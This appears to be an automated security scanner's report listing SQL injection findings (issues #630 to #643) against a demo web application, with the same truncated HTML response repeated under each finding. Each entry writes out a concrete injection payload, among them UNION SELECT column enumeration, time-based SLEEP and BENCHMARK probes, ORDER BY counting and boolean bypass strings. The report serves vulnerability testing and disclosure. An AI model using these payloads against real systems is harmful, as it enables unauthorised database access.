href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #630\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #631\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\") or \"1\"=\"1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #632\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAnD SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #633\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #634\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #635\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #636\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #637\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or ''^'Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #638\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT USER(),SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #639\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioSLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #640\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #641\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io (SELECT * FROM (SELECT(SLEEP(5)))ecMj)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #642\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #643\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT NULL\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 